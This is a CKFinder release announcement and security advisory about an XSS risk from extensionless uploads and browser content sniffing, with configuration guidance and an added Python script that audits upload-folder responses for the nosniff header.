CKFinder 3.5.1 and CKFinder 2.6.3 released


We would like to announce that CKFinder 3.5.1 and CKFinder 2.6.3 have just been released. We have also published new guidelines for securing your server against content sniffing by web browsers when using a public folder for uploaded files.

CKFinder 2.6.3 includes a security patch for the server-side part of the application, so updating is highly recommended. The security patch for CKFinder 2.6.3 was added to the PHP, ASP.NET, classic ASP and ColdFusion server-side connectors. The Java version was not affected.

The issue that is resolved in the patch and the updated security guidelines was reported by Joshua Provoste as a problem related to handling files without extension, content sniffing, and various XSS issues to which it may lead. We would like to thank Joshua for his cooperation!

Updated security guidelines

Before this release, the existing CKFinder documentation could give the impression that CKFinder can fully protect against content sniffing by web browsers. To clarify this and explain how to achieve a 100% secure configuration, we added a new article about content sniffing performed by web browsers and the recommended server configuration that avoids exposing users to extra risk.

Uploading a file, both without an extension and with an allowed extension, under some circumstances may lead to XSS vulnerabilities. XSS may occur if:

  • CKFinder is configured to upload files to a publicly accessible folder,
  • and the web server does not add the X-Content-Type-Options: nosniff header to all HTTP responses when serving files from the publicly available folder.

With the above conditions, a malicious user may upload a file without the .html extension that will be rendered by some browsers like a regular HTML file. This happens due to content sniffing as some browsers perform additional checks on the raw file contents.
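The following Python check is an added example, not code from CKFinder or its documentation. It audits response headers captured from a public upload folder and reports every response that would leave a browser free to sniff the content. The paths and responses are constructed samples, and the missing Content-Type finding is an extra check beyond the nosniff condition described above.

```python
import io
from http.client import parse_headers

# Constructed sample response heads for files served from a public upload
# folder (paths and header values are illustrative, not from a real server).
SAMPLE_RESPONSES = {
    "/userfiles/files/report": (          # extensionless upload, no headers set
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Length: 182\r\n"
        b"\r\n"
    ),
    "/userfiles/images/logo.png": (       # correctly configured response
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: image/png\r\n"
        b"x-content-type-options: NoSniff\r\n"
        b"\r\n"
    ),
    "/userfiles/files/notes.txt": (       # header present but with a wrong value
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: text/plain\r\n"
        b"X-Content-Type-Options: none\r\n"
        b"\r\n"
    ),
}

def audit_response(raw):
    """Return the list of sniffing-related findings for one raw response head."""
    fp = io.BytesIO(raw)
    fp.readline()                          # skip the status line
    headers = parse_headers(fp)            # header names are case-insensitive
    values = [v.strip().lower()
              for v in headers.get_all("X-Content-Type-Options", [])]
    findings = []
    if not values:
        findings.append("missing X-Content-Type-Options")
    elif set(values) != {"nosniff"}:
        findings.append("X-Content-Type-Options is not 'nosniff'")
    if not headers.get("Content-Type"):
        findings.append("missing Content-Type")
    return findings

def audit_folder(responses):
    """Map each failing path to its findings; an empty dict means all passed."""
    report = {path: audit_response(raw) for path, raw in responses.items()}
    return {path: found for path, found in report.items() if found}

if __name__ == "__main__":
    for path, found in audit_folder(SAMPLE_RESPONSES).items():
        print(path, "->", "; ".join(found))
```

To audit a real deployment, capture the response head for one file of each type in the upload folder (including an extensionless one) and pass the bytes to `audit_response`.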

Please take a moment to read the updated security guidelines for CKFinder and update your web server configuration:

Related CVE: CVE-2019-15891.

CKFinder 2.6.3

CKFinder 2.6.3 contains a security patch for the server-side part of the application and an update is highly recommended.

In version and older it was possible to upload files without any extension. This applies to CKFinder for ASP, CKFinder for ASP.NET, CKFinder for ColdFusion and CKFinder for PHP. CKFinder for Java was not affected. Version 2.6.3 introduces a special type of extension (no_ext), which allows server administrators to explicitly enable the possibility of uploading files without any extension.

We recommend always explicitly defining the allowed extensions for uploaded files and setting up a secure server configuration as explained in the guidelines mentioned above.

Related CVE: CVE-2019-15862.

CKFinder 3.5.1

In CKFinder 3 it was impossible to upload files without an extension. This feature has been added in version 3.5.1, but in order to allow such files, they must be explicitly enabled by using the special no_ext extension when defining the list of allowed or denied file extensions.

We recommend always explicitly defining the allowed extensions for uploaded files and setting up a secure server configuration as explained in the guidelines mentioned above.


See the release notes for a full list of changes.


Download CKFinder now! Also available as a CKFinder 3 Symfony bundle and CKFinder 3 Laravel package.

Reporting issues and feature requests

If you miss anything in CKFinder, have ideas on how the best file uploader for CKEditor could be improved, or found a bug, please do not hesitate to report an issue in the CKFinder issue tracker. The tracker is public, so not only can you submit your ideas, but you can also browse existing issues and add your comments there.


All CKFinder licenses come with a year of dedicated support straight from core CKFinder developers. You can also refer to StackOverflow for community support.
